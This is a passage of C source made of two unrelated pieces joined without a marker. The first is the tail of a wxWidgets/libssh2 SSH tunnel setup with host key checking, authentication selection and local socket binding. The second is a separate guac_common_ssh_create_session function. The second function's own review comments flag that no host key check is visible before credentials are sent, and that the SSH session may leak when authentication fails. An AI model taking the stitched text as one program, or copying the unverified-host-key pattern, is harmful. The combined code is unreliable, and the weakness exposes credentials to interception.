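			LogSSHTunnelErrors(_("SSH error: Could not retrieve the SSH host key fingerprint!"), GetId());
			Cleanup();
			return false;
		}

		// The SHA-1 digest is 20 bytes; format it as space-separated hex.
		wxString newHostKey = wxEmptyString;
		for(int i = 0; i < 20; i++)
		{
			newHostKey += wxString::Format(wxT("%02X "), (unsigned char)fingerprint[i]);
		}

		// Check if the SSH Host Key is verified
		if(!IsHostKeyVerified(newHostKey))
		{
			Cleanup();
			return false;
		}

		/* check what authentication methods are available */
		userauthlist = libssh2_userauth_list(m_session, m_username.mb_str(), strlen(m_username.mb_str()));
		if (!userauthlist)
		{
			// The list comes from the remote server and may be NULL;
			// strstr() below must not see it.
			LogSSHTunnelErrors(_("SSH error: No supported authentication methods found!"), GetId());
			Cleanup();
			return false;
		}

		if (strstr(userauthlist, "password"))
			offered |= AUTH_PASSWORD;
		if(strstr(userauthlist, "keyboard-interactive"))
			offered |= AUTH_KEYBOARD_INTERACTIVE;
		if (strstr(userauthlist, "publickey"))
			offered |= AUTH_PUBLICKEY;

		// Pick exactly one method, and only one that matches what was
		// configured in m_enAuthMethod. The server-supplied list must not be
		// able to steer m_password (the key passphrase when public key
		// authentication is configured) into a password login.
		if ((offered & AUTH_PASSWORD) && (m_enAuthMethod == AUTH_PASSWORD))
			auth = AUTH_PASSWORD;
		else if ((offered & AUTH_KEYBOARD_INTERACTIVE) && (m_enAuthMethod == AUTH_PASSWORD))
			auth = AUTH_KEYBOARD_INTERACTIVE;
		else if ((offered & AUTH_PUBLICKEY) && (m_enAuthMethod == AUTH_PUBLICKEY))
			auth = AUTH_PUBLICKEY;
		else
			auth = AUTH_NONE;

		if (auth == AUTH_PASSWORD)
		{
			rc = libssh2_userauth_password(m_session, m_username.mb_str(), m_password.mb_str());
			if (rc)
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by password failed with error code %d"), rc), GetId());
				Cleanup();
				return false;
			}
		}
		else if (auth == AUTH_KEYBOARD_INTERACTIVE)
		{
			rc = libssh2_userauth_keyboard_interactive(m_session, m_username.mb_str(), &CSSHTunnelThread::keyboard_interactive);
			if (rc)
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by password failed with error code %d"), rc), GetId());
				Cleanup();
				return false;
			}
		}
		else if (auth == AUTH_PUBLICKEY)
		{
			// m_password doubles as the private key passphrase here.
#ifdef HAVE_GCRYPT
			rc = libssh2_userauth_publickey_fromfile(m_session, m_username.mb_str(), m_publickey.mb_str(), m_privatekey.mb_str(), m_password.mb_str());
#else
			rc = libssh2_userauth_publickey_fromfile(m_session, m_username.mb_str(), NULL, m_privatekey.mb_str(), m_password.mb_str());
#endif
			if (rc)
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: Authentication by identity file failed with error code %d"), rc), GetId());
				Cleanup();
				return false;
			}
		}
		else
		{
			LogSSHTunnelErrors(_("SSH error: No supported authentication methods found!"), GetId());
			Cleanup();
			return false;
		}

		// Get the IP Address of local machine
		wxArrayString arrLocalIP;
		if(resolveDNS("localhost", arrLocalIP))
		{
			m_listensock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
			memset(&m_sin, 0 , sizeof(m_sin));
			m_sin.sin_family = AF_INET;

			// Give port no to 0 so that bind will automatically select the available port.
			m_sin.sin_port = htons(0);
			if (INADDR_NONE == (m_sin.sin_addr.s_addr = inet_addr(arrLocalIP.Item(0).mb_str())))
			{
				Cleanup();
				return false;
			}

			sockopt = 1;
			setsockopt(m_listensock, SOL_SOCKET, SO_REUSEADDR, &sockopt,
			           sizeof(sockopt));
			m_sinlen = sizeof(m_sin);
			if (-1 == bind(m_listensock, (struct sockaddr *)&m_sin, m_sinlen))
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: bind failed with error code %d"), wxSysErrorCode()), GetId());
				Cleanup();
				return false;
			}

			// Read back the address so the port chosen by bind() is known.
			if (getsockname(m_listensock, (struct sockaddr *)&m_sin, &m_sinlen) == -1)
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: getsockname() failed with error code %d"), wxSysErrorCode()), GetId());
				Cleanup();
				return false;
			}

			if (-1 == listen(m_listensock, 2))
			{
				LogSSHTunnelErrors(wxString::Format(_("SSH error: listen failed with error code %d"), wxSysErrorCode()), GetId());
				Cleanup();
				return false;
			}

			m_local_listenip = wxString(inet_ntoa(m_sin.sin_addr), wxConvLibc);
			m_local_listenport = ntohs(m_sin.sin_port);

			wxLogInfo(wxT("Waiting for TCP connection on %s:%d..."), m_local_listenip.c_str(), m_local_listenport);
			return true;
		}
		else
		{
			LogSSHTunnelErrors(_("SSH error: Unable to resolve localhost"), GetId());
		}
	}
	else
	{
		LogSSHTunnelErrors(wxString::Format(_("SSH error: Unable to resolve host: %s"), m_tunnelhost.c_str()), GetId());
	}

	return false;
}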
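/**
 * Connects to the given SSH server, performs the SSH handshake and
 * authenticates as the given user.
 *
 * Every address returned by getaddrinfo() for hostname/port is tried in turn,
 * each with a fresh socket of the matching address family, until one connect
 * succeeds.
 *
 * @param client
 *     The client the session belongs to. Failures are reported through
 *     guac_client_abort() and diagnostics through guac_client_log().
 *
 * @param hostname
 *     The hostname or address of the SSH server.
 *
 * @param port
 *     The port or service name to connect to, as a string.
 *
 * @param user
 *     The user to authenticate as; stored in the session and used by
 *     guac_common_ssh_authenticate().
 *
 * @return
 *     A newly allocated session, or NULL if connecting, the handshake or
 *     authentication fails. The socket and the session structure are
 *     released on failure.
 *
 * NOTE(review): no host key check is visible in this function between the
 * handshake and guac_common_ssh_authenticate(); confirm whether the server's
 * host key is verified elsewhere before credentials are sent.
 */
guac_common_ssh_session* guac_common_ssh_create_session(guac_client* client,
        const char* hostname, const char* port, guac_common_ssh_user* user) {

    int retval;

    int fd = -1;
    struct addrinfo* addresses;
    struct addrinfo* current_address;

    /* Start out empty so they are printable even if getnameinfo() fails */
    char connected_address[1024] = "";
    char connected_port[64] = "";

    struct addrinfo hints = {
        .ai_family   = AF_UNSPEC,
        .ai_socktype = SOCK_STREAM,
        .ai_protocol = IPPROTO_TCP
    };

    /* Get addresses connection */
    if ((retval = getaddrinfo(hostname, port, &hints, &addresses))) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Error parsing given address or port: %s",
                gai_strerror(retval));
        return NULL;
    }

    /* Attempt connection to each address until success */
    current_address = addresses;
    while (current_address != NULL) {

        /* Resolve hostname */
        if ((retval = getnameinfo(current_address->ai_addr,
                current_address->ai_addrlen,
                connected_address, sizeof(connected_address),
                connected_port, sizeof(connected_port),
                NI_NUMERICHOST | NI_NUMERICSERV)))
            guac_client_log(client, GUAC_LOG_DEBUG,
                    "Unable to resolve host: %s", gai_strerror(retval));

        /* Get a socket of this address's family. hints asks for AF_UNSPEC,
         * so the list may mix IPv4 and IPv6 entries, and a socket whose
         * connect() failed should not be reused. */
        fd = socket(current_address->ai_family, SOCK_STREAM, 0);
        if (fd < 0) {
            guac_client_log(client, GUAC_LOG_DEBUG,
                    "Unable to create socket: %s", strerror(errno));
            current_address = current_address->ai_next;
            continue;
        }

        /* Connect */
        if (connect(fd, current_address->ai_addr,
                        current_address->ai_addrlen) == 0) {

            guac_client_log(client, GUAC_LOG_DEBUG,
                    "Successfully connected to host %s, port %s",
                    connected_address, connected_port);

            /* Done if successful connect */
            break;

        }

        /* Otherwise log information regarding connect failure (before
         * close() can overwrite errno) */
        guac_client_log(client, GUAC_LOG_DEBUG, "Unable to connect to "
                "host %s, port %s: %s",
                connected_address, connected_port, strerror(errno));

        close(fd);
        fd = -1;

        current_address = current_address->ai_next;

    }

    /* Free addrinfo on both the success and the failure path */
    freeaddrinfo(addresses);

    /* If unable to connect to anything, fail */
    if (fd < 0) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR,
                "Unable to connect to any addresses.");
        return NULL;
    }

    /* Allocate new session */
    guac_common_ssh_session* common_session =
        malloc(sizeof(guac_common_ssh_session));
    if (common_session == NULL) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Session allocation failed.");
        close(fd);
        return NULL;
    }

    /* Open SSH session */
    LIBSSH2_SESSION* session = libssh2_session_init_ex(NULL, NULL,
            NULL, common_session);
    if (session == NULL) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_SERVER_ERROR,
                "Session allocation failed.");
        free(common_session);
        close(fd);
        return NULL;
    }

    /* Perform handshake */
    if (libssh2_session_handshake(session, fd)) {
        guac_client_abort(client, GUAC_PROTOCOL_STATUS_UPSTREAM_ERROR,
                "SSH handshake failed.");
        /* The libssh2 session was created here and is not referenced
         * anywhere else yet, so release it as well */
        libssh2_session_free(session);
        free(common_session);
        close(fd);
        return NULL;
    }

    /* Store basic session data */
    common_session->client = client;
    common_session->user = user;
    common_session->session = session;
    common_session->fd = fd;

    /* Attempt authentication */
    if (guac_common_ssh_authenticate(common_session)) {
        /* NOTE(review): the libssh2 session is not released on this path;
         * confirm whether guac_common_ssh_authenticate() frees it before
         * adding libssh2_session_free() here */
        free(common_session);
        close(fd);
        return NULL;
    }

    /* Return created session */
    return common_session;

}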